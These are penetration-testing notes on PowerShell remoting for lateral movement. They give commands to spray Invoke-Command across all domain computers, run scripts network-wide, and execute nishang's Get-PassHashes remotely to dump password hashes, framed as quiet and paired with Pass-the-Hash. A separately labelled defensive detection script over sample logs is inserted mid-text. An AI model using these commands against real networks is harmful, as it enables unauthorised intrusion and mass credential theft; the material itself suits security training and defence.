PowerShell Remoting

Instead of having to connect to a workstation from outside the network every time we want to execute commands, if we are already in a PowerShell session we can either start a new session on our target box or issue commands to the target remotely from the session we are in.

Executing commands this way is of course less noisy. You can run scripts or locally defined functions from your current workstation against your target remotely. You can even issue commands to multiple targets in the network in one statement if you have the privileges to do so (Fan-Out Remoting).

You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not enabled already; doing so requires Administrator privileges.

This works excellently in conjunction with Pass-the-Hash.

Some of these commands will require PowerView.

Storing Credentials into the Session

  • Method 1: Using the Get-Credential cmdlet from a remote desktop:

$cred = Get-Credential <user>  # then enter the password in the popup

  • Method 2: Using the New-Object cmdlet:

$user = '<user>'
$pwd = '<password>'
# Wrap the plaintext password in a SecureString so it can go into a PSCredential
$secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd

Begin a New Session on Another Workstation

Enter-PSSession -ComputerName <computer>

Running a Stateful Session and Then Entering It

$sess = New-PSSession -ComputerName <computer> [-Credential $cred]
Enter-PSSession -Session $sess

Executing Commands Remotely on Another Workstation

Invoke-Command -ComputerName <computer> -ScriptBlock {<command>}
Invoke-Command -Session $sess -ScriptBlock {<command>}

Spraying Computers to See Where You Have Access

Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer)
  • My little script is a bit cleaner...

# Loop over every domain computer and print which ones accept a remote command
foreach ($comp in Get-NetComputer) {
    $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$null)
}
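The "less noisy" point cuts both ways: every target reached by a fan-out Invoke-Command records a network logon, so the spray itself is what a defender looks for. The PowerShell below is an added example that is not part of these notes; it runs over constructed sample records (the record shape, field names and the thresholds are assumptions) and flags one account and source address reaching many distinct hosts within a short window.

```powershell
# Added defensive example, not part of the original notes.
# Each remote Invoke-Command target logs a network logon (Security 4624, LogonType 3);
# Microsoft-Windows-WinRM/Operational event 91 on the target narrows that to WinRM,
# since LogonType 3 also covers SMB. Fan-out to (Get-NetComputer) therefore looks like
# one account, from one source address, logging on to many distinct hosts in minutes.
# The records below are constructed sample data in the shape a log collector might return.

$records = @(
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:00:01'; Host='WS01'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=3 }
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:00:02'; Host='WS02'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=3 }
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:00:04'; Host='WS03'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=3 }
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:00:05'; Host='FS01'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=3 }
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:00:09'; Host='WS03'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=3 }  # repeat host, not a new target
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:02:00'; Host='WS01'; User='CORP\admin'; Source='10.0.0.9'; EventId=4624; LogonType=3 }  # single host, benign
    [pscustomobject]@{ Time=[datetime]'2024-05-01T10:03:00'; Host='WS07'; User='CORP\jdoe';  Source='10.0.0.5'; EventId=4624; LogonType=2 }  # interactive logon, excluded
)

function Find-RemotingFanOut {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $MinHosts = 5,        # distinct targets that count as a spray (assumed threshold)
        [int] $WindowMinutes = 10   # sliding window length (assumed threshold)
    )
    $Events |
        Where-Object { $_.EventId -eq 4624 -and $_.LogonType -eq 3 } |
        Group-Object User, Source |
        ForEach-Object {
            $sorted = @($_.Group | Sort-Object Time)
            for ($i = 0; $i -lt $sorted.Count; $i++) {
                # Count distinct hosts in the window that opens at this logon
                $start = $sorted[$i].Time
                $end   = $start.AddMinutes($WindowMinutes)
                $hosts = @($sorted | Where-Object { $_.Time -ge $start -and $_.Time -le $end } |
                           Select-Object -ExpandProperty Host | Sort-Object -Unique)
                if ($hosts.Count -ge $MinHosts) {
                    [pscustomobject]@{
                        User          = $sorted[$i].User
                        Source        = $sorted[$i].Source
                        WindowStart   = $start
                        DistinctHosts = $hosts.Count
                        Hosts         = ($hosts -join ', ')
                    }
                    break   # one alert per (user, source) pair is enough
                }
            }
        }
}

# With the sample data this emits one alert: CORP\jdoe from 10.0.0.5 reaching 4 hosts in under a minute.
Find-RemotingFanOut -Events $records -MinHosts 4 -WindowMinutes 5 | Format-Table -AutoSize
```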

Executing Scripts Remotely

Invoke-Command -FilePath <C:\path\to\script> -ComputerName <computer> [-Credential $cred]
  • You can spray this command onto other workstations at once as well...

Invoke-Command -FilePath <C:\path\to\script> -ComputerName (Get-NetComputer)

Execute Locally Loaded Functions on Remote Machines

# Using Get-PassHashes.ps1 from nishang as an example
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList <args>] [-Credential $cred] 2>$NUL

Copying Files Remotely

Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path
